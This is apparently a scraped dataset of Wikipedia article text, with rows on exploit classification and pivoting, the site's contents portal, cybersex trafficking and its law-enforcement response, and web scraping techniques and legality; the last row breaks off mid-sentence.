increasingly utilizing cyber threat intelligence to identify vulnerabilities and prevent hacks before they occur. 8 There are several methods of classifying exploits. The most common is by how the exploit communicates to the vulnerable software. A remote exploit works over a network and exploits the security vulnerability without any prior access to the vulnerable system. A local exploit requires prior access or physical access to the vulnerable system, and usually increases the privileges of the person running the exploit past those granted by the system administrator. Exploits against client applications also exist, usually consisting of modified servers that send an exploit if accessed with a client application. A common form of exploits against client applications are browser exploits. Exploits against client applications may also require some interaction with the user and thus may be used in combination with the social engineering method. Another classification is by the action against the vulnerable system; unauthorized data access, arbitrary code execution, and denial of service are examples. Exploitations are commonly categorized and named 9 10 by the type of vulnerability they exploit (see vulnerabilities for a list) clarification needed , whether they are local remote and the result of running the exploit (e.g. EoP, DoS, spoofing). A zero-click attack is an exploit that requires no user interaction to operate that is to say, no key-presses or mouse clicks. 11 FORCEDENTRY, discovered in 2021, is an example of a zero-click attack. 12 13 These exploits are commonly the most sought after exploits (specifically on the underground exploit market) because the target typically has no way of knowing they have been compromised at the time of exploitation. In 2022, NSO Group was reportedly selling zero-click exploits to governments for breaking into individuals' phones. 14 Pivoting is a technique employed by both hackers and penetration testers to expand their access within a target network. By compromising a system, attackers can leverage it as a platform to target other systems that are typically shielded from direct external access by firewalls. Internal networks often contain a broader range of accessible machines compared to those exposed to the internet. For example, an attacker might compromise a web server on a corporate network and then utilize it to target other systems within the same network. This approach is often referred to as a multi-layered attack. Pivoting is also known as island hopping. Pivoting can further be distinguished into proxy pivoting and VPN pivoting: Typically, the proxy or VPN applications enabling pivoting are executed on the target computer as the payload of an exploit. Pivoting is usually done by infiltrating a part of a network infrastructure (as an example, a vulnerable printer or thermostat) and using a scanner to find other devices connected to attack them. By attacking a vulnerable piece of networking, an attacker could infect most or all of a network and gain complete control. |
299 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contents | Explore the vast knowledge of Wikipedia through these helpful resources. If you have a specific topic in mind, use Wikipedia's search box. If you don't know exactly what you are looking for or wish to explore broad areas, click on a link in the header menu at the top of this page, or begin your browsing below: Wikipedia organizes its content into distinct subject classifications, each with further subdivisions. Explore the diverse cultures, arts, beliefs, and customs of human societies. Discover the wonders of Earth's lands, features, inhabitants, and planetary phenomena. Learn about physical, mental, and social health. Dive into the past through written records and scholarly exploration. Explore chronological events through our comprehensive timelines. Stay up-to-date with encyclopedia entries covering ongoing events. Delve into diverse human actions, from leisure and entertainment to industry and warfare. Explore the study of quantity, structure, space, and change. Understand natural phenomena through empirical evidence, observations, and experiments. Learn about collective entities, ethnic groups, and nations. Dive deep into fundamental questions about existence, knowledge, values, and more. Access comprehensive information collections compiled for easy retrieval. Refer to various third-party classification systems linked to Wikipedia articles. Access sources on specific topics for further reading or verification. Explore social-cultural systems, beliefs, ethics, and more. Understand collectives, social interactions, political authority, and cultural norms. Learn about techniques, skills, methods, and processes in technology and science. Get summaries of broad topics with links to subtopics, biographies, and related articles. Explore topics in outline format, linking to more detailed articles. Find enumerations of specific types, such as lists of countries and people. Access featured articles, images, news, and more through thematic portals. Access lists of terms with definitions through alphabetical glossaries. Browse Wikipedia's category pages, which index articles by subject. Explore subjects that demand high-quality articles, grouped by importance. Discover Wikipedia's best, reviewed and vetted for quality. Explore well-written, factually accurate articles that meet editorial standards. Listen to Wikipedia articles as spoken word recordings. Browse Wikipedia's articles alphabetically. Topics Types Places, people and times Indices |
300 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cybersex_trafficking | Cybersex trafficking, live streaming sexual abuse, 1 2 3 webcam sex tourism abuse 4 or ICTs (Information and Communication Technologies) facilitated sexual exploitation 5 is a cybercrime involving sex trafficking and the live streaming of coerced 6 7 sexual acts and or rape on webcam. 8 9 10 Cybersex trafficking is distinct from other sex crimes. 8 Victims are transported by traffickers to 'cybersex dens', 11 12 13 which are locations with webcams 14 9 15 and internet-connected devices with live streaming software. There, victims are forced to perform sexual acts 7 on themselves or other people 16 in sexual slavery 7 17 or raped by the traffickers or assisting assaulters in live videos. Victims are frequently ordered to watch the paying live distant consumers or purchasers on shared screens and follow their commands. 10 18 19 It is often a commercialized, 20 cyber form of forced prostitution. 7 21 Women, 22 23 24 children, and people in poverty are particularly vulnerable 10 15 25 to coerced internet sex. The computer-mediated communication images produced during the crime are a type of rape pornography 26 or child pornography 27 28 29 that is filmed and broadcast in real time and can be recorded. 30 There is no data about the magnitude of cybersex trafficking in the world. 31 32 33 The technology to detect all incidents of the live streaming crime has not been developed yet. 34 Millions of reports of cybersex trafficking are sent to authorities annually. 35 failed verification It is a billion-dollar, illicit industry 28 that was brought on with the Digital Age 9 25 and is connected to globalization. It has surged from the world-wide expansion of telecommunications and global proliferation of the internet 10 and smartphones, 36 37 38 particularly in developing countries. It has also been facilitated by the use of software, encrypted communication systems, 39 and network technologies 40 that are constantly evolving, 20 as well as the growth of international online payment systems with wire transfer services 36 32 41 and cryptocurrencies that hide the transactor's identities. 42 43 The transnational nature and global scale of cybersex trafficking necessitate a united response by the nations, corporations, and organizations of the world to reduce incidents of the crime; 16 protect, rescue, and rehabilitate victims; and arrest and prosecute the perpetrators. Some governments have initiated advocacy and media campaigns that focus on awareness of the crime. They have also implemented training seminars held to teach law enforcement, prosecutors, and other authorities, as well as NGO workers, to combat the crime and provide trauma-informed aftercare service. 44 New legislation combating cybersex trafficking is needed in the twenty-first century. 45 38 Cyber , as a combining form, is defined as 'connected with electronic communication networks, especially the internet. 46 Sex trafficking is human trafficking for the purpose of sexual exploitation, including sexual slavery. 47 Victims of cybersex trafficking are trafficked or transported to 'cybersex dens, which are rooms or locations with a webcam. 14 The cybercrime also involves the transporting or streaming of images of the victims' bodies and sexual assaults in real time through a computer with a webcam to other computers connected to the internet. 8 6 10 It thus occurs partly in the physical or real world, as the sexual assault is real, 48 and partly in cyberspace. 49 Victims, predominantly women 50 51 18 and children, 22 are abducted, 7 threatened, or deceived. 10 18 Others are drugged. 52 They are held captive and locked up 18 in rooms with covered or no windows and a webcam. 10 They experience physical and psychological trauma. 10 28 44 Gang rape has occurred on webcam. 17 53 Some are coerced into incest. 31 Victims have been denied food, 17 deprived of sleep, 18 and been forced to perform when sick. 6 They have contracted diseases, including tuberculosis, while in captivity. 6 A number are assaulted 6 18 or tortured. 29 54 Victims can be exploited in any location where the cybersex traffickers have a computer, tablet, or phone with internet connection. 9 These locations, commonly referred to as 'cybersex dens, 11 12 13 can be in homes, hotels, offices, internet cafes, and other businesses, making them extremely difficult or impossible for law enforcement to identify. 10 The number of cybersex trafficking victims is unknown. 31 32 Some victims are simultaneously forced into prostitution in a brothel or other location. 55 Rescues involving live streaming commercial sexual exploitation of children by parents often require a separation of the minors from the families and new lives for them in a shelter. 44 Some victims are not physically transported and held captive, but rather victims of online sextortion. They are threatened, 56 webcam blackmailed, 57 or bullied to film themselves committing online sexual acts. 58 Victims have been coerced to self-penetrate, in what has been called 'rape at a distance. 57 Others are deceived, including by phony romantic partners who are really rape or child pornography distributors, to film themselves masturbating. 59 The videos are live streamed to purchasers or recorded for later sale. 30 Those who are of a lower class, discriminate race, minority, or other social disadvantages are at an increased risk of being victimized. 40 The cybersex trafficking and or non-consensual dissemination of sexual content involving women and girls, often involving threats, have been referred to as "digital gender violence" or 'online gender-based violence. 60 Victims, despite being coerced, continue to be criminalized and prosecuted in certain jurisdictions. 40 Perpetrators who transport victims to locations with webcams and live streaming software. They or assisting assaulters then commit and film sex crimes to produce real time rape pornography or child pornography materials that may or may not be recorded. Male and female 41 61 62 perpetrators, operating behind a virtual barrier and often with anonymity, come from countries throughout the world 32 36 28 and from every social and economic class. Some traffickers and assaulters have been the victim's family members, friends, and acquaintances. 10 15 28 Traffickers can be part of or aided by international criminal organizations, local gangs, or small crime rings or just be one person. 10 They operate clandestinely and sometimes lack coordinated structures that can be eradicated by authorities. 10 The encrypted nature of modern technology makes it difficult to track perpetrators. 32 Some are motivated by sexual gratification. 29 Traffickers advertise children on the internet to obtain purchasers. 33 Funds acquired by cybersex traffickers can be laundered. 39 Overseas predators seek out and pay for live streaming or made-to-order services 36 that sexually exploit children. 9 15 31 They engage in threats to gain the trust of local traffickers, often the victims' parents or neighbors, before the abuse takes place. 44 The online audience who are often from another country, may issue commands to the victims or rapists and pay for the services. The majority of purchasers or consumers are men, 54 28 as women who engage in cybersex prefer personal consensual cybersex in chat rooms or direct messaging. 63 There is a strong correlation between viewing purchasing child cybersex materials and actually sexually abusing children; cybersex materials can motivate cybersex consumers to move from the virtual world to committing sex crimes in person. 64 Cybersex trafficking is partly an internet-based crime. 17 Perpetrators use social media networks, 41 videoconferences, dating pages, online chat rooms, mobile apps, 48 dark web sites, 43 36 and other pages and domains. 65 They also use Telegram and other cloud-based instant messaging 57 and voice over IP services, as well as peer-to-peer (P2P) platforms, virtual private networks (VPN), 40 and Tor protocols and software, among other applications, to carry out activities anonymously. Consumers have made payments to traffickers, who are sometimes the victim's family members, using Western Union, PayPal, and other electronic payment systems. 66 Cybersex trafficking occurs commonly on some dark websites, 43 where users are provided sophisticated technical cover against identification. 36 Perpetrators use Facebook, 29 39 57 Instagram, 67 and other social media technologies. 36 41 They use fake job listings in order to lure in victims. 68 They do this by creating fake job agencies to get victims to meet with the perpetrator. 69 These fake job listings can be things such as modeling gigs. Social media makes it easier for perpetrators to groom multiple people at once. They continuously send friend requests to increase their chances of getting a victim. 70 Social media gives perpetrators the platform to hide their identity. On social media, one can pretend to be anyone. Therefore, perpetrators use fake accounts to get victims attention. Most perpetrators pose as an attractive person who is living a lavish life. 69 This is used to attract vulnerable users who desire those luxuries. People who desperately desire a luxury living are the easiest targets. They fall for the manipulation that they too can live a life like ones depicted on fake accounts. Furthermore, younger people are more likely to be victims to cybersex on social media. 71 They are less aware and still learning how to use social media. In addition, adolescents are the more vulnerable on social media because they are exploring. Adolescents can use social media to explore their sexuality. This makes them more accessible to perpetrators. 72 Without guidance adolescents are at risk of falling for the tricks used to lure them into cybersex. In addition, they are less likely to detect when their security is at risk. 73 Perpetrators fake a romantic relationship with the victims on social media to exploit them. 74 Perpetrators will convince victims to perform sexual acts. They can perform these sexual acts through tools such as webcams. More common on social media is to send pictures or videos. Victims send explicit pictures or videos because they trust the "friend" they have on social media. The victims will do it out of "love" or naiveness. Others do the performances out of fear. They can be threatened with information they previously shared with the perpetrator when they befriended them. However, it becomes an endless cycle when they perform the sexual acts once. After victims do these sexual acts, perpetrators use it as leverage. Perpetrators threaten them to do more sexual acts or they will share to their family and friends what they already have of them. 67 Cybersex trafficking occurs on Skype 75 37 36 and other videoconferencing applications. 76 32 Pedophiles direct child sex abuse using its live streaming services. 75 36 29 The Australian Federal Police (AFP) investigates cybersex trafficking crimes domestically and in the Asia-Pacific region. 38 75 32 In 2016, Queensland Police Service officers from Task Force Argos In 2016, Queensland Police Service officers from Task Force Argos executed a federal search warrant at a 58 year-old Australian man's residence. 77 The Australian man pleaded guilty to numerous charges, including soliciting a child for sex and having sex with a child under 16 years of age outside of Australia. 78 Using Skype, the man conducted "live remote" sexual abuse, exploiting two young children in the Philippines while making payments to their mother. 77 78 The exploitation began when the children were only two and seven years old, and the abuse continued for nearly five years. 77 In May 2019, according to the Australian Federal Police (AFP), numerous cases were also uncovered related to Australians allegedly paying for and manipulating child sexual abuse. 79 In November 2019, Australia was alerted by Child Sexual Abuse live streaming when AUSTRAC filed legal action against Westpac Bank in relation to over 23 million suspected violations of the Anti-Money Laundering and Counter-Terrorism Financing Act 2006 (Cth). 77 Since 2017, IJM (International Justice Mission) Australia has been working on legal reforms to strengthen Australia's response to OSEC, commonly known as online sex trafficking of children. 80 On June 16, 2020, both houses of the Parliament of Australia enacted the Crimes Legislation Amendment (Sexual Crimes Against Children and Community Protection Measures) Bill 2019, which received royal assent on June 22, 2020. 80 Jacob Sarkodee, CEO of IJM Australia, noted that this new legislation recognizes the contribution of Australians to the growing demand for online sex trafficking of children. 80 According to 2020 Global OSEC report, 81 Australians are the third largest purchasers of cybersex trafficking of children in Philippines. 81 80 Under the proposal made by the IJM, the new legislation specifies that those who watch live streaming of child cybersex trafficking will receive the same penalties as those who manipulate and direct the sexual abuse of children themselves. 80 Cybersex trafficking occurred in the 2018 2020 Nth room case in South Korea. 82 In March 2020, South Korean news agencies reported some details about Nth room case: in crypto-messaging apps such as Telegram and Discord, "at least 74 women and 16 minors performed "sex shows" online for global audience of thousands who paid for cryptocurrency". 83 The victims were manipulated and tortured by viewers and were referred to as slaves. This case is related to the widespread availability and expansion of spy cameras (often referred to as "Molka") in South Korea. citation needed North Korean women and girls have been subjected to penetrative vaginal and anal rape, groping, and forced masturbation in 'online rape dens' in China. 6 17 84 In the trade for female North Koreans, cybersex trafficking is the small but rapidly growing element. 85 Girls as young as 9 years old were abused and exploited in "sex shows" that are broadcast live online to a paying audience, many of them are believed to be Korean men. 85 86 According to Korea Future Initiative 2019, an estimated 60 percent of North Korean female refugees in China are trafficked into the sex trade, 85 of these, about 15 percent is sold into cybersex dens for exploitation by a global online audiences. 87 China's crackdown on undocumented North Koreans in July 2017 and a developing cybersex industry have fueled the rapid expansion of cybersex dens. 87 Cybersex trafficking is thought to be extremely lucrative. 85 According to primary research, helpers experiences, and survivors testimonies, live streamed videos of cybersex featuring North Korean girls ages 9 14 can cost $60 $110, while videos featuring North Korean girls and women ages 17 24 can cost up to $90. 85 Offenders are believed to manipulate victims by the means of drugs and violence (physical and sexual). 87 In investigation conducted from February to September 2018, South Korean websites have been discovered to promote North Korean cybersex and pornography, even in the form of "pop-up" advertisements. 85 The high demand of North Korean cybersex victims is largely driven by South Korean man high involvement in searching Korean-language pornography. 87 85 In South Korea, compared to the penalties made for production and distribution of child sexual abuse imagery, the penalties for those who possess images of child porn are far below international standards. 88 The European Union Agency for Law Enforcement Cooperation (Europol) investigates and spreads awareness about live streaming sexual abuse. 43 Europol's European Cybercrime Centre (EC3) is especially equipped to combat the cybercrime. 20 The United Kingdom's National Crime Agency (NCA) investigates cybersex trafficking crimes domestically and abroad. 38 36 32 Europe was the second largest source of "online enticement" CyberTipline reports. 89 According to Global Threat Assessment 2018, many customers of Online Sexual Exploitation of Children (OSEC) are centered in Europe, along with those who are traffickers and victims of OSEC. 90 In 2019, Europe accounted for 14% of all sexual exploitation worldwide. 91 Minors are usually trafficked for the purpose of sexual exploitation to EU, and most of them are foreign female children from Nigeria. 91 In Europe, women and children exploited in the sex trade are increasingly being advertised online, with children are found being promoted as adults. 91 The great Internet freedom 92 and low web hosting costs 93 make the Netherlands one of the countries with a major market for online sexual exploitation. 94 In the 2018 annual report,Internet Watch Foundation (IWF) has said that about 79 percent (82803 out of 105047) of the URLs for materials of child sexual abuse are in Europe, with the vast majority of them are Netherlands-based. 95 The material is produced from different countries in the globe, but they are all hosted on computer servers in the Netherlands. 92 IWF has reported that over 105,047 URLs were linked to illegal images of child sexual abuse, with the Netherlands hosting 47 percent of the content. 93 95 The Federal Bureau of Investigation (FBI) 38 27 and Homeland Security Investigations (HSI), the investigative arm of the United States Department of Homeland Security, carry out anti-cybersex trafficking operations. 61 The United States Department of State Office to Monitor and Combat Trafficking in Persons (J TIP) partners with agencies and organization overseas to rescue cybersex trafficked victims. 96 The United Nations Children's Fund (UNICEF) identified the Philippines as the global center of cybersex trafficking. 11 The Office of Cybercrime within the Philippines Department of Justice receives hundreds of thousands of tips of videos and images of sexually exploited Filipino children on the internet. 11 The Philippine National Police, along with its Women and Children Protection Center (WCPC), Philippine Internet Crimes Against Child Center (PICACC), 32 Philippine InterAgency Council Against Trafficking (IACAT, Department of Justice (Philippines), and Department of Social Welfare and Development 96 fight cybersex trafficking in the country. 13 61 Rancho ni Cristo in Cebu is a shelter devoted exclusively to rehabilitating children of live streaming sexual abuse. 44 Children in the shelter are provided food, medical care, counseling, mentoring and life skills training. The Royal Thai Police's Internet Crimes Against Children (TICAC) task force combats cybersex trafficking in the nation. 59 Authorities, skilled in online forensics, cryptography, and other areas, 32 use data analysis and information sharing to fight cybersex trafficking. 75 Deep learning, algorithms, and facial recognition are also hoped to combat the cybercrime. 39 Flagging or panic buttons on certain videoconferencing software enable users to report suspicious people or acts of live streaming sexual abuse. 30 Investigations are sometimes hindered by privacy laws that make it difficult to monitor and arrest perpetrators. 36 The International Criminal Police Organization (ICPO-INTERPOL) collects evidence of live streaming sexual abuse and other sex crimes. 40 The Virtual Global Taskforce (VGT) comprises law enforcement agencies across the world who combat the cybercrime. 20 The United Nations Children's Fund (UNICEF) funds training for police to identify and address the cybercrime. 16 Multinational technology companies, such as Google, Microsoft, and Facebook, collaborate, develop digital tools, and assist law enforcement in combating it. 39 Led by Thorn, an organization that uses technology to combat child sexual exploration globally, a coalition of Big Tech companies including Facebook, Microsoft, Google, and Twitter have been developing ever more sophisticated tools to put in the hands of law enforcement worldwide to combat this issue at every level. The Ministry of Education Malaysia introduced cybersex trafficking awareness in secondary school syllabuses. 97 Research shows that predators under 18 years old use coercion and threats to conceal abuse, but adult predators use psychological abuse. Adult predators use psychological abuse to trick the child into thinking that they actually consented to having sex with them or that the child is responsible for what happened to them. 98 Teaching the risks of online chatting to children is important to reduce the risk of being a victim of cybersex. With online chatting, a predator might gain knowledge on what a child's hobbies and favorite items are by stalking their page or waiting to see what a child posts. After a predator gains this personal knowledge, he goes on to speak to this child, pretending to also be a child with the same interests to lure them in after gaining their trust. This plays a risk because the child may never really know who's on the other side of the screen and potentially become a victim of a predator. 99 Cybersex trafficking shares similar characteristics or overlaps with other sex crimes. That said, according to attorney Joshua T. Carback, it is "a unique development in the history of sexual violence" 8 and "distinct in several respects from traditional conceptions of online child pornography and human trafficking". 8 The main particularization is that involves victims being trafficked or transported and then raped or abused in live webcam sex shows. 8 100 41 The United Nations Office on Drugs and Crime identified the cybercrime involving trafficked victims on webcam sex shows as an emerging problem. 101 The illegal live streaming shows occur in 'cybersex dens, which are rooms equipped with webcams. 14 The cybercrime has sometimes been informally called 'webcam rape'. 102 103 The International Justice Mission is one of the world's leading nonprofit organizations that carries out anti-cybersex trafficking initiatives. 25 15 10 End Child Prostitution, Child Pornography and Trafficking of Children for Sexual Purposes (ECPAT) 10 43 and the Peace and Integrity of Creation-Integrated Development Center Inc., a non-profit organization in the Philippine, support law enforcement operations against cybersex trafficking. 96 The National Center for Missing Exploited Children in the United States assists authorities in cybersex trafficking cases. 104 It provides CyberTipline reports to law enforcement agencies. 105 Terre des hommes is an international non-profit that combats the live streaming sexual abuse of children. 36 28 The Korea Future Initiative is a London-based organization that obtains evidence and publicizes violations of human rights, including the cybersex trafficking of North Korean women and girls in China. 51 |
301 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-16 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures 